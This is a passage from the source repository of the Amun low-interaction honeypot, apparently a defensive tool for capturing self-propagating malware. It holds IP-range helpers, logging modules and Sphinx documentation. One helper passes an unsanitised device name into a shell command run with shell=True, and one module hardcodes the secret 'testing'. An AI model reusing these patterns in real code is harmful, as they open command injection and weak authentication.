 62 | 		return
 63 | 
 64 | 	def getIPsFromDevice(self, device):
 65 | 		### "ip addr show <device>"
 66 | 		command = "ip addr show %s" % (device)
 67 | 		child = subprocess.Popen([command], shell=True, bufsize=1024, stdout=subprocess.PIPE, close_fds=True)
 68 | 		line = child.stdout.readline()
 69 | 		while line:
 70 | 			line = str(line).strip()
 71 | 			m = self.deviceIP.search(line)
 72 | 			if m:
 73 | 				self.resultIPlist.append(m.groups()[0].strip())
 74 | 			line = child.stdout.readline()
 75 | 		child.wait()
 76 | 
 77 | 	def getIPsFromRange(self, rangeStr):
 78 | 		### 192.168.0.1 - 192.168.0.255
 79 | 		startIP = rangeStr[0]
 80 | 		stopIP = rangeStr[1]
 81 | 		curIP = startIP
 82 | 		curIPSplitted = map(int, curIP.split('.'))
 83 | 		invalid = False
 84 | 		self.resultIPlist.append(curIP)
 85 | 		while curIP!=stopIP and not invalid:
 86 | 			curIPSplitted[3] += 1
 87 | 			curIP = "%i.%i.%i.%i" % (curIPSplitted[0],curIPSplitted[1],curIPSplitted[2],curIPSplitted[3])
 88 | 			self.resultIPlist.append(curIP)
 89 | 			if curIPSplitted[3] > 255:
 90 | 				curIPSplitted[3] = 0
 91 | 				curIPSplitted[2] += 1
 92 | 			if curIPSplitted[2] > 255:
 93 | 				curIPSplitted[2] = 0
 94 | 				curIPSplitted[1] += 1
 95 | 			if curIPSplitted[1] > 255:
 96 | 				curIPSplitted[1] = 0
 97 | 				curIPSplitted[0] += 1
 98 | 			if curIPSplitted[0] > 255:
 99 | 				invalid = True
100 | 		return
101 | 
102 | 	def getIPsFromCIDR(self, networkCIDR):
103 | 		### 192.168.0.0/24
104 | 		baseIP = networkCIDR[0]
105 | 		netmask = networkCIDR[1]
106 | 		ip = struct.unpack('>L', socket.inet_aton(baseIP))[0]
107 | 		diff1 = int(ip & int(netmask))
108 | 		diff2 = 32-int(netmask)
109 | 		if diff1==0:
110 | 			startip = ip-diff1
111 | 			numHosts = pow(2,diff2)
112 | 			for i in xrange(numHosts):
113 | 				self.resultIPlist.append(socket.inet_ntoa(struct.pack('>L', startip+i)))
114 | 		else:
115 | 			self.resultIPlist.append(socket.inet_ntoa(struct.pack('>L', ip)))
116 | 		return
117 | 
118 | class fifoqueue(object):
119 | 	__slots__ = ("list", "size")
120 | 
121 | 	def __init__(self, size):
122 | 		self.list = []
123 | 		self.size = size
124 | 
125 | 	def insert(self, value):
126 | 		if len(self.list)>=self.size:
127 | 			self.remove()
128 | 		self.list.append(value)
129 | 
130 | 	def remove(self):
131 | 		test = self.list
132 | 		test.reverse()
133 | 		test.pop()
134 | 		test.reverse()
135 | 		self.list = test
136 | 		if not self.list:
137 | 			self.list = []
138 | 
139 | 	def contains(self, value):
140 | 		if value in self.list:
141 | 			return True
142 | 		return False
143 | 


--------------------------------------------------------------------------------
/core/vulngenerator.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | class vulngenerator:
19 | 
20 | 	def __init__(self):
21 | 		self.receivedData = []
22 | 		self.replyData = []
23 | 		### maybe hash from first stage?
24 | 		self.vulnName = None
25 | 		self.stages = 0
26 | 		self.welcomeMessage = None
27 | 		self.port = None
28 | 		### self.stagesDict[1] = [ReadBytes, RequestBytes, ReplyBytes, DefaultReply=random]
29 | 		self.stagesDict = {}
30 | 
31 | 	def writeReceived(self, data):
32 | 		self.receivedData.append(data)
33 | 
34 | 	def writeReply(self, data):
35 | 		self.replyData.append(data)
36 | 
37 | 	def writeXMLfile(self):
38 | 		pass
39 | 


--------------------------------------------------------------------------------
/docs/build/doctrees/configuration.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/doctrees/configuration.doctree


--------------------------------------------------------------------------------
/docs/build/doctrees/environment.pickle:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/doctrees/environment.pickle


--------------------------------------------------------------------------------
/docs/build/doctrees/index.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/doctrees/index.doctree


--------------------------------------------------------------------------------
/docs/build/doctrees/installation.doctree:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/doctrees/installation.doctree


--------------------------------------------------------------------------------
/docs/build/html/.buildinfo:
--------------------------------------------------------------------------------
1 | # Sphinx build info version 1
2 | # This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done.
3 | config: 652903a53d8cbb6275efb3e167205b4c
4 | tags: 645f666f9bcd5a90fca523b33c5a78b7
5 | 


--------------------------------------------------------------------------------
/docs/build/html/_sources/configuration.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | Configuration
 3 | =============
 4 | 
 5 | The core configuration for Amun is done in the file amun.conf in the conf directory.
 6 | 
 7 | Operating System Configuration
 8 | ------------------------------
 9 | 
10 | In case you encounter problems with too many open files. The following configuration changes might solve the problem:
11 | 
12 | Linux:
13 | 
14 |   .. code: python
15 |     
16 |     - echo "104854" > /proc/sys/fs/file-max
17 | 
18 | Amun Honeypot Configuration
19 | ---------------------------
20 | 


--------------------------------------------------------------------------------
/docs/build/html/_sources/index.txt:
--------------------------------------------------------------------------------
 1 | .. Amun documentation master file, created by
 2 |    sphinx-quickstart on Tue Jan 28 20:53:40 2014.
 3 |    You can adapt this file completely to your liking, but it should at least
 4 |    contain the root `toctree` directive.
 5 | 
 6 | Welcome to Amun's documentation!
 7 | ================================
 8 | 
 9 | Amun is a so-called low-interaction honeypot, aimed at capturing malware that
10 | propagates by exploiting vulnerabilities in remotely accessible services. An 
11 | example of such a malware is the infamous Conficker or the SQL Slammer worm. 
12 | In order to catch such malicious software, Amun emulates a large
13 | variety of vulnerable services, such as Microsoft SMB. Due to the fact that
14 | all services are just emulated, the honeypot itself is never really under the 
15 | control of the malware, but just pretends to be successfully exploited.
16 | 
17 | Contents:
18 | 
19 | .. toctree::
20 |    :maxdepth: 2
21 | 
22 |    installation
23 |    configuration
24 | 
25 | 
26 | Indices and tables
27 | ==================
28 | 
29 | * :ref:`genindex`
30 | * :ref:`modindex`
31 | * :ref:`search`
32 | 
33 | 


--------------------------------------------------------------------------------
/docs/build/html/_sources/installation.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | Installation
 3 | =================
 4 | 
 5 | Installation of Amun is pretty easy and does not require compilation or complex configuration procedures.
 6 | 
 7 | Requirements
 8 | ------------
 9 | 
10 | Amun is primarily intended to run on Linux systems. It was programmed on Debian, but should run on any Linux platform that has Python support.
11 | Amun requires Python (>=2.6) to run. It works fine with Python 2.7, but it is not intended to run with Python 3.
12 | 
13 | * Linux (e.g. Debian)
14 | * Python 2.7
15 | 
16 | Optional Components
17 | -------------------
18 | 
19 | * Python Psyco (available at http://psyco.sourceforge.net/)
20 |     + Psyco is a JIT (Just-In-Time compiler) to speed up the execution of Python code
21 | * Python MySQLdb
22 |     + In order to use the MySQL logging module
23 | * Python Psycopg2
24 |     + In order ot use Surfnet or PostgreSQL logging module
25 | 


--------------------------------------------------------------------------------
/docs/build/html/_static/ajax-loader.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/ajax-loader.gif


--------------------------------------------------------------------------------
/docs/build/html/_static/comment-bright.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/comment-bright.png


--------------------------------------------------------------------------------
/docs/build/html/_static/comment-close.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/comment-close.png


--------------------------------------------------------------------------------
/docs/build/html/_static/comment.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/comment.png


--------------------------------------------------------------------------------
/docs/build/html/_static/down-pressed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/down-pressed.png


--------------------------------------------------------------------------------
/docs/build/html/_static/down.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/down.png


--------------------------------------------------------------------------------
/docs/build/html/_static/file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/file.png


--------------------------------------------------------------------------------
/docs/build/html/_static/minus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/minus.png


--------------------------------------------------------------------------------
/docs/build/html/_static/plus.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/plus.png


--------------------------------------------------------------------------------
/docs/build/html/_static/pygments.css:
--------------------------------------------------------------------------------
 1 | .highlight .hll { background-color: #ffffcc }
 2 | .highlight  { background: #eeffcc; }
 3 | .highlight .c { color: #408090; font-style: italic } /* Comment */
 4 | .highlight .err { border: 1px solid #FF0000 } /* Error */
 5 | .highlight .k { color: #007020; font-weight: bold } /* Keyword */
 6 | .highlight .o { color: #666666 } /* Operator */
 7 | .highlight .cm { color: #408090; font-style: italic } /* Comment.Multiline */
 8 | .highlight .cp { color: #007020 } /* Comment.Preproc */
 9 | .highlight .c1 { color: #408090; font-style: italic } /* Comment.Single */
10 | .highlight .cs { color: #408090; background-color: #fff0f0 } /* Comment.Special */
11 | .highlight .gd { color: #A00000 } /* Generic.Deleted */
12 | .highlight .ge { font-style: italic } /* Generic.Emph */
13 | .highlight .gr { color: #FF0000 } /* Generic.Error */
14 | .highlight .gh { color: #000080; font-weight: bold } /* Generic.Heading */
15 | .highlight .gi { color: #00A000 } /* Generic.Inserted */
16 | .highlight .go { color: #333333 } /* Generic.Output */
17 | .highlight .gp { color: #c65d09; font-weight: bold } /* Generic.Prompt */
18 | .highlight .gs { font-weight: bold } /* Generic.Strong */
19 | .highlight .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
20 | .highlight .gt { color: #0044DD } /* Generic.Traceback */
21 | .highlight .kc { color: #007020; font-weight: bold } /* Keyword.Constant */
22 | .highlight .kd { color: #007020; font-weight: bold } /* Keyword.Declaration */
23 | .highlight .kn { color: #007020; font-weight: bold } /* Keyword.Namespace */
24 | .highlight .kp { color: #007020 } /* Keyword.Pseudo */
25 | .highlight .kr { color: #007020; font-weight: bold } /* Keyword.Reserved */
26 | .highlight .kt { color: #902000 } /* Keyword.Type */
27 | .highlight .m { color: #208050 } /* Literal.Number */
28 | .highlight .s { color: #4070a0 } /* Literal.String */
29 | .highlight .na { color: #4070a0 } /* Name.Attribute */
30 | .highlight .nb { color: #007020 } /* Name.Builtin */
31 | .highlight .nc { color: #0e84b5; font-weight: bold } /* Name.Class */
32 | .highlight .no { color: #60add5 } /* Name.Constant */
33 | .highlight .nd { color: #555555; font-weight: bold } /* Name.Decorator */
34 | .highlight .ni { color: #d55537; font-weight: bold } /* Name.Entity */
35 | .highlight .ne { color: #007020 } /* Name.Exception */
36 | .highlight .nf { color: #06287e } /* Name.Function */
37 | .highlight .nl { color: #002070; font-weight: bold } /* Name.Label */
38 | .highlight .nn { color: #0e84b5; font-weight: bold } /* Name.Namespace */
39 | .highlight .nt { color: #062873; font-weight: bold } /* Name.Tag */
40 | .highlight .nv { color: #bb60d5 } /* Name.Variable */
41 | .highlight .ow { color: #007020; font-weight: bold } /* Operator.Word */
42 | .highlight .w { color: #bbbbbb } /* Text.Whitespace */
43 | .highlight .mf { color: #208050 } /* Literal.Number.Float */
44 | .highlight .mh { color: #208050 } /* Literal.Number.Hex */
45 | .highlight .mi { color: #208050 } /* Literal.Number.Integer */
46 | .highlight .mo { color: #208050 } /* Literal.Number.Oct */
47 | .highlight .sb { color: #4070a0 } /* Literal.String.Backtick */
48 | .highlight .sc { color: #4070a0 } /* Literal.String.Char */
49 | .highlight .sd { color: #4070a0; font-style: italic } /* Literal.String.Doc */
50 | .highlight .s2 { color: #4070a0 } /* Literal.String.Double */
51 | .highlight .se { color: #4070a0; font-weight: bold } /* Literal.String.Escape */
52 | .highlight .sh { color: #4070a0 } /* Literal.String.Heredoc */
53 | .highlight .si { color: #70a0d0; font-style: italic } /* Literal.String.Interpol */
54 | .highlight .sx { color: #c65d09 } /* Literal.String.Other */
55 | .highlight .sr { color: #235388 } /* Literal.String.Regex */
56 | .highlight .s1 { color: #4070a0 } /* Literal.String.Single */
57 | .highlight .ss { color: #517918 } /* Literal.String.Symbol */
58 | .highlight .bp { color: #007020 } /* Name.Builtin.Pseudo */
59 | .highlight .vc { color: #bb60d5 } /* Name.Variable.Class */
60 | .highlight .vg { color: #bb60d5 } /* Name.Variable.Global */
61 | .highlight .vi { color: #bb60d5 } /* Name.Variable.Instance */
62 | .highlight .il { color: #208050 } /* Literal.Number.Integer.Long */
63 | 


--------------------------------------------------------------------------------
/docs/build/html/_static/up-pressed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/up-pressed.png


--------------------------------------------------------------------------------
/docs/build/html/_static/up.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/_static/up.png


--------------------------------------------------------------------------------
/docs/build/html/genindex.html:
--------------------------------------------------------------------------------
 1 | 
 2 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
 3 |   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 4 | 
 5 | 
 6 | <html xmlns="http://www.w3.org/1999/xhtml">
 7 |   <head>
 8 |     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 9 |     
10 |     <title>Index &mdash; Amun 0.2.2 documentation</title>
11 |     
12 |     <link rel="stylesheet" href="_static/default.css" type="text/css" />
13 |     <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
14 |     
15 |     <script type="text/javascript">
16 |       var DOCUMENTATION_OPTIONS = {
17 |         URL_ROOT:    './',
18 |         VERSION:     '0.2.2',
19 |         COLLAPSE_INDEX: false,
20 |         FILE_SUFFIX: '.html',
21 |         HAS_SOURCE:  true
22 |       };
23 |     </script>
24 |     <script type="text/javascript" src="_static/jquery.js"></script>
25 |     <script type="text/javascript" src="_static/underscore.js"></script>
26 |     <script type="text/javascript" src="_static/doctools.js"></script>
27 |     <link rel="top" title="Amun 0.2.2 documentation" href="index.html" /> 
28 |   </head>
29 |   <body>
30 |     <div class="related">
31 |       <h3>Navigation</h3>
32 |       <ul>
33 |         <li class="right" style="margin-right: 10px">
34 |           <a href="#" title="General Index"
35 |              accesskey="I">index</a></li>
36 |         <li><a href="index.html">Amun 0.2.2 documentation</a> &raquo;</li> 
37 |       </ul>
38 |     </div>  
39 | 
40 |     <div class="document">
41 |       <div class="documentwrapper">
42 |         <div class="bodywrapper">
43 |           <div class="body">
44 |             
45 | 
46 | <h1 id="index">Index</h1>
47 | 
48 | <div class="genindex-jumpbox">
49 |  
50 | </div>
51 | 
52 | 
53 |           </div>
54 |         </div>
55 |       </div>
56 |       <div class="sphinxsidebar">
57 |         <div class="sphinxsidebarwrapper">
58 | 
59 |    
60 | 
61 | <div id="searchbox" style="display: none">
62 |   <h3>Quick search</h3>
63 |     <form class="search" action="search.html" method="get">
64 |       <input type="text" name="q" />
65 |       <input type="submit" value="Go" />
66 |       <input type="hidden" name="check_keywords" value="yes" />
67 |       <input type="hidden" name="area" value="default" />
68 |     </form>
69 |     <p class="searchtip" style="font-size: 90%">
70 |     Enter search terms or a module, class or function name.
71 |     </p>
72 | </div>
73 | <script type="text/javascript">$('#searchbox').show(0);</script>
74 |         </div>
75 |       </div>
76 |       <div class="clearer"></div>
77 |     </div>
78 |     <div class="related">
79 |       <h3>Navigation</h3>
80 |       <ul>
81 |         <li class="right" style="margin-right: 10px">
82 |           <a href="#" title="General Index"
83 |              >index</a></li>
84 |         <li><a href="index.html">Amun 0.2.2 documentation</a> &raquo;</li> 
85 |       </ul>
86 |     </div>
87 |     <div class="footer">
88 |         &copy; Copyright 2014, Jan Goebel.
89 |       Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.2.1.
90 |     </div>
91 |   </body>
92 | </html>
93 | 


--------------------------------------------------------------------------------
/docs/build/html/objects.inv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/docs/build/html/objects.inv


--------------------------------------------------------------------------------
/docs/build/html/search.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  2 |   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  3 | 
  4 | 
  5 | <html xmlns="http://www.w3.org/1999/xhtml">
  6 |   <head>
  7 |     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  8 |     
  9 |     <title>Search &mdash; Amun 0.2.2 documentation</title>
 10 |     
 11 |     <link rel="stylesheet" href="_static/default.css" type="text/css" />
 12 |     <link rel="stylesheet" href="_static/pygments.css" type="text/css" />
 13 |     
 14 |     <script type="text/javascript">
 15 |       var DOCUMENTATION_OPTIONS = {
 16 |         URL_ROOT:    './',
 17 |         VERSION:     '0.2.2',
 18 |         COLLAPSE_INDEX: false,
 19 |         FILE_SUFFIX: '.html',
 20 |         HAS_SOURCE:  true
 21 |       };
 22 |     </script>
 23 |     <script type="text/javascript" src="_static/jquery.js"></script>
 24 |     <script type="text/javascript" src="_static/underscore.js"></script>
 25 |     <script type="text/javascript" src="_static/doctools.js"></script>
 26 |     <script type="text/javascript" src="_static/searchtools.js"></script>
 27 |     <link rel="top" title="Amun 0.2.2 documentation" href="index.html" />
 28 |   <script type="text/javascript">
 29 |     jQuery(function() { Search.loadIndex("searchindex.js"); });
 30 |   </script>
 31 |   
 32 |   <script type="text/javascript" id="searchindexloader"></script>
 33 |    
 34 | 
 35 |   </head>
 36 |   <body>
 37 |     <div class="related">
 38 |       <h3>Navigation</h3>
 39 |       <ul>
 40 |         <li class="right" style="margin-right: 10px">
 41 |           <a href="genindex.html" title="General Index"
 42 |              accesskey="I">index</a></li>
 43 |         <li><a href="index.html">Amun 0.2.2 documentation</a> &raquo;</li> 
 44 |       </ul>
 45 |     </div>  
 46 | 
 47 |     <div class="document">
 48 |       <div class="documentwrapper">
 49 |         <div class="bodywrapper">
 50 |           <div class="body">
 51 |             
 52 |   <h1 id="search-documentation">Search</h1>
 53 |   <div id="fallback" class="admonition warning">
 54 |   <script type="text/javascript">$('#fallback').hide();</script>
 55 |   <p>
 56 |     Please activate JavaScript to enable the search
 57 |     functionality.
 58 |   </p>
 59 |   </div>
 60 |   <p>
 61 |     From here you can search these documents. Enter your search
 62 |     words into the box below and click "search". Note that the search
 63 |     function will automatically search for all of the words. Pages
 64 |     containing fewer words won't appear in the result list.
 65 |   </p>
 66 |   <form action="" method="get">
 67 |     <input type="text" name="q" value="" />
 68 |     <input type="submit" value="search" />
 69 |     <span id="search-progress" style="padding-left: 10px"></span>
 70 |   </form>
 71 |   
 72 |   <div id="search-results">
 73 |   
 74 |   </div>
 75 | 
 76 |           </div>
 77 |         </div>
 78 |       </div>
 79 |       <div class="sphinxsidebar">
 80 |         <div class="sphinxsidebarwrapper">
 81 |         </div>
 82 |       </div>
 83 |       <div class="clearer"></div>
 84 |     </div>
 85 |     <div class="related">
 86 |       <h3>Navigation</h3>
 87 |       <ul>
 88 |         <li class="right" style="margin-right: 10px">
 89 |           <a href="genindex.html" title="General Index"
 90 |              >index</a></li>
 91 |         <li><a href="index.html">Amun 0.2.2 documentation</a> &raquo;</li> 
 92 |       </ul>
 93 |     </div>
 94 |     <div class="footer">
 95 |         &copy; Copyright 2014, Jan Goebel.
 96 |       Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.2.1.
 97 |     </div>
 98 |   </body>
 99 | </html>
100 | 


--------------------------------------------------------------------------------
/docs/build/html/searchindex.js:
--------------------------------------------------------------------------------
1 | Search.setIndex({envversion:42,terms:{all:0,code:2,just:[0,2],psyco:2,mysql:2,follow:1,fine:2,content:0,execut:2,pretti:2,psycopg2:2,should:2,platform:2,jit:2,program:2,under:0,surfnet:2,might:1,python:2,requir:[],emul:0,page:0,compil:2,malici:0,work:2,captur:0,procedur:2,realli:0,mysqldb:2,intend:2,successfulli:0,sourceforg:2,index:0,speed:2,access:0,larg:0,net:2,order:[0,2],proc:[],smb:0,core:1,run:2,never:0,confick:0,solv:1,search:0,postgresql:2,easi:2,due:0,mani:1,honeypot:[],support:2,softwar:0,infam:0,primarili:2,encount:1,modul:[0,2],echo:[],exploit:0,done:1,linux:[1,2],instal:[],open:1,avail:2,log:2,interact:0,system:2,debian:2,compon:[],call:0,low:0,too:1,option:[],malwar:0,"catch":0,vulner:0,"case":1,remot:0,servic:0,pretend:0,worm:0,aim:0,problem:1,control:0,propag:0,conf:1,ani:2,itself:0,file:1,slammer:0,complex:2,varieti:0,you:1,http:2,max:[],sql:0,chang:1,directori:1,doe:2,exampl:0,time:2,microsoft:0,fact:0},objtypes:{},objnames:{},filenames:["index","configuration","installation"],titles:["Welcome to Amun&#8217;s documentation!","Configuration","Installation"],objects:{},titleterms:{oper:1,welcom:0,configur:1,system:1,indic:0,compon:2,tabl:0,instal:2,honeypot:1,document:0,amun:[0,1],requir:2,option:2}})
2 | 


--------------------------------------------------------------------------------
/docs/source/configuration.rst:
--------------------------------------------------------------------------------
 1 | 
 2 | Configuration
 3 | =============
 4 | 
 5 | The core configuration for Amun is done in the file amun.conf in the conf directory.
 6 | 
 7 | Operating System Configuration
 8 | ------------------------------
 9 | 
10 | In case you encounter problems with too many open files. The following configuration changes might solve the problem:
11 | 
12 | Linux:
13 | 
14 |   .. code: python
15 |     
16 |     - echo "104854" > /proc/sys/fs/file-max
17 | 
18 | Amun Honeypot Configuration
19 | ---------------------------
20 | 


--------------------------------------------------------------------------------
/docs/source/index.rst:
--------------------------------------------------------------------------------
 1 | .. Amun documentation master file, created by
 2 |    sphinx-quickstart on Tue Jan 28 20:53:40 2014.
 3 |    You can adapt this file completely to your liking, but it should at least
 4 |    contain the root `toctree` directive.
 5 | 
 6 | Welcome to Amun's documentation!
 7 | ================================
 8 | 
 9 | Amun is a so-called low-interaction honeypot, aimed at capturing malware that
10 | propagates by exploiting vulnerabilities in remotely accessible services. An 
11 | example of such a malware is the infamous Conficker or the SQL Slammer worm. 
12 | In order to catch such malicious software, Amun emulates a large
13 | variety of vulnerable services, such as Microsoft SMB. Due to the fact that
14 | all services are just emulated, the honeypot itself is never really under the 
15 | control of the malware, but just pretends to be successfully exploited.
16 | 
17 | Contents:
18 | 
19 | .. toctree::
20 |    :maxdepth: 2
21 | 
22 |    installation
23 |    configuration
24 | 
25 | 
26 | Indices and tables
27 | ==================
28 | 
29 | * :ref:`genindex`
30 | * :ref:`modindex`
31 | * :ref:`search`
32 | 
33 | 


--------------------------------------------------------------------------------
/docs/source/installation.rst:
--------------------------------------------------------------------------------
 1 | 
 2 | Installation
 3 | =================
 4 | 
 5 | Installation of Amun is pretty easy and does not require compilation or complex configuration procedures.
 6 | 
 7 | Requirements
 8 | ------------
 9 | 
10 | Amun is primarily intended to run on Linux systems. It was programmed on Debian, but should run on any Linux platform that has Python support.
11 | Amun requires Python (>=2.6) to run. It works fine with Python 2.7, but it is not intended to run with Python 3.
12 | 
13 | * Linux (e.g. Debian)
14 | * Python 2.7
15 | 
16 | Optional Components
17 | -------------------
18 | 
19 | * Python Psyco (available at http://psyco.sourceforge.net/)
20 |     + Psyco is a JIT (Just-In-Time compiler) to speed up the execution of Python code
21 | * Python MySQLdb
22 |     + In order to use the MySQL logging module
23 | * Python Psycopg2
24 |     + In order ot use Surfnet or PostgreSQL logging module
25 | 


--------------------------------------------------------------------------------
/hexdumps/.empty:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/hexdumps/.empty


--------------------------------------------------------------------------------
/http_images/logo_right.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/http_images/logo_right.png


--------------------------------------------------------------------------------
/log_modules/log-blastomat/log_blastomat.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | import time
19 | import amun_logging
20 | import sha
21 | import socket
22 | 
23 | class log(object):
24 | 	__slots__ = ("log_name", "log_obj")
25 | 
26 | 	def __init__(self):
27 | 		try:
28 | 			self.log_name = "Log Blast-o-Mat"
29 | 		except KeyboardInterrupt:
30 | 			raise
31 | 
32 | 	def initialConnection(self, attackerIP, attackerPort, victimIP, victimPort, identifier, initialConnectionsDict, loLogger):
33 | 		pass
34 | 
35 | 	def incoming(self, attackerIP, attackerPort, victimIP, victimPort, vulnName, timestamp, downloadMethod, loLogger, attackerID, shellcodeName):
36 | 		try:
37 | 			if shellcodeName=="None":
38 | 				return
39 | 			self.log_obj = amun_logging.amun_logging("log_blastomat", loLogger)
40 | 			tstart = timestamp
41 | 			tend = timestamp
42 | 			proceed = "Kick"
43 | 			type = "Exploit"
44 | 			secret = "testing"
45 | 			blastHost = "127.0.0.1"
46 | 			blastPort = 12345
47 | 
48 | 			mess = "%s%s%s%s%s%s" % (type,attackerIP,tstart,tend,proceed,secret)
49 | 			shahash = sha.sha(mess).hexdigest()
50 | 
51 | 			message = '<?xml version="1.0" encoding="UTF-8"?>'
52 | 			message += '<!DOCTYPE BlastEvent SYSTEM "xmlblast.dtd">'
53 | 			message += '<BlastEvent>'
54 | 			message += '<Type>%s</Type>' % (type)
55 | 			message += '<IP>%s</IP>' % (attackerIP)
56 | 			message += '<TStart>%s</TStart>' % (tstart)
57 | 			message += '<TEnd>%s</TEnd>' % (tend)
58 | 			message += '<Proceed>%s</Proceed>' % (proceed)
59 | 			message += '<Ports>%s</Ports>' % (victimPort)
60 | 			message += '<Module>%s</Module>' % (vulnName)
61 | 			message += '<Hash>%s</Hash>' % (shahash)
62 | 			message += '</BlastEvent>'
63 | 
64 | 			addr = (blastHost, blastPort)
65 | 			UDPSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
66 | 			if(UDPSock.sendto(message,addr)):
67 | 				self.log_obj.log("blast-o-mat message for %s send (%s)" % (attackerIP,shellcodeName), 12, "crit", Log=True, display=True)
68 | 			else:
69 | 				self.log_obj.log("failed sending message to blast-o-mat", 12, "crit", Log=True, display=False)
70 | 			UDPSock.close()
71 | 			self.log_obj.log("blast-o-mat: %s" % (message), 12, "crit", Log=True, display=False)
72 | 		except KeyboardInterrupt:
73 | 			raise
74 | 
75 | 	def successfullSubmission(self, attackerIP, attackerPort, victimIP, downloadURL, md5hash, data, filelength, downMethod, loLogger, vulnName, fexists):
76 | 		pass
77 | 


--------------------------------------------------------------------------------
/log_modules/log-mail/log_mail.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | try:
13 | 	import psyco ; psyco.full()
14 | 	from psyco.classes import *
15 | except ImportError:
16 | 	pass
17 | 
18 | import time
19 | import amun_logging
20 | import smtplib
21 | import amun_config_parser
22 | 
23 | class log:
24 | 	def __init__(self):
25 | 		try:
26 | 			self.log_name = "Log eMail"
